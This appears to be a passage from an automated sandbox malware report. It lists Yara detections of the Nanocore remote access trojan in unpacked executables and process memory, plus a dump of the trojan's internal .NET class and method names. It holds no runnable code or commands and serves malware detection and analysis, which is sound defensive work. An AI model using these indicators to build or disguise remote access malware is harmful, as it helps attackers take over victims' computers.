      Source: Yara matchFile source: 2.2.nanocore.exe.58b4629.13.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.4a90000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.4fa0000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.3.dhcpmon.exe.7130f0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.58b0000.12.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.4970000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.34c5530.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.47f0000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.dhcpmon.exe.1ed70000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 8.2.nanocore.exe.1eed1458.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.346e3b6.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.35b7815.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.34c5530.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.dhcpmon.exe.1ed70000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.715c48.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.3477815.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.nanocore.exe.1eed1458.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.3547815.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.3357815.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.696a10.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.35b31ec.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.33f5530.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.32d5530.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.5b31b8.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.3.dhcpmon.exe.7130f0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.34731ec.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.4940000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.7130f0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.4970000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.35431ec.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.nanocore.exe.1eec0000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.35b31ec.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.47f0000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.dhcpmon.exe.1ed81458.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.35ae3b6.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 8.2.nanocore.exe.1eed1458.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.35431ec.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.58b0000.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.dhcpmon.exe.1ed91458.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.dhcpmon.exe.1ed80000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.dhcpmon.exe.1ed80000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.7130f0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.353e3b6.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.34731ec.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.334e3b6.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.dhcpmon.exe.1ed91458.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.715c48.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.5b31b8.2.raw.unpack, type: UNPACKEDPE

      Remote Access Functionality:

      barindex
      Detected Nanocore RatShow sources
      Source: nanocore.exe, 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: nanocore.exeString found in binary or memory: NanoCore.ClientPluginHost
      Source: nanocore.exe, 00000002.00000002.905801654.0000000002531000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: nanocore.exe, 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: dhcpmon.exe, 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: nanocore.exeString found in binary or memory: NanoCore.ClientPluginHost
      Source: nanocore.exe, 0000000A.00000002.684361480.0000000002510000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: dhcpmon.exeString found in binary or memory: NanoCore.ClientPluginHost
      Source: dhcpmon.exe, 0000000B.00000002.684555433.0000000002320000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: dhcpmon.exe, 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: dhcpmon.exeString found in binary or memory: NanoCore.ClientPluginHost
      Source: dhcpmon.exe, 0000000D.00000002.703774283.000000000342C000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.684499268.00000000034FC000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.703714772.00000000033F1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.704559063.0000000004FA2000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.683969306.00000000006FC000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.703774283.000000000342C000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.907930500.0000000004A92000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.686692380.0000000004922000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.905801654.0000000002531000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.904977643.0000000000598000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.684652674.000000000330C000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.703409413.00000000006E7000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.684426343.00000000034C1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000001.645917465.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.686102213.00000000049C2000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.684614120.00000000032D1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.906581049.00000000035AC000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000003.685637337.0000000000711000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5752, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6152, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: nanocore.exe PID: 7064, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: nanocore.exe PID: 7104, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: nanocore.exe PID: 4108, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: nanocore.exe PID: 5904, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6724, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6704, type: MEMORY
      Source: Yara matchFile source: 10.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.nanocore.exe.1eed1458.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.696a10.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.33531ec.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.4920000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 8.2.nanocore.exe.1eec0000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.32d5530.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.nanocore.exe.1eec0000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.4910000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.dhcpmon.exe.1ed81458.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.4910000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 8.2.nanocore.exe.1eec0000.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.4940000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.33531ec.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.33f5530.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.49c0000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.58b4629.13.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.4a90000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.4fa0000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.3.dhcpmon.exe.7130f0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.58b0000.12.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.4970000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.34c5530.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.47f0000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.dhcpmon.exe.1ed70000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 8.2.nanocore.exe.1eed1458.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.346e3b6.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.35b7815.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.34c5530.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.dhcpmon.exe.1ed70000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.715c48.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.3477815.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.nanocore.exe.1eed1458.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.3547815.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.3357815.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.696a10.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.35b31ec.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.33f5530.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.32d5530.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.5b31b8.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.3.dhcpmon.exe.7130f0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.34731ec.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.4940000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.7130f0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.4970000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.35431ec.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.nanocore.exe.1eec0000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.35b31ec.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.47f0000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.dhcpmon.exe.1ed81458.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.35ae3b6.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
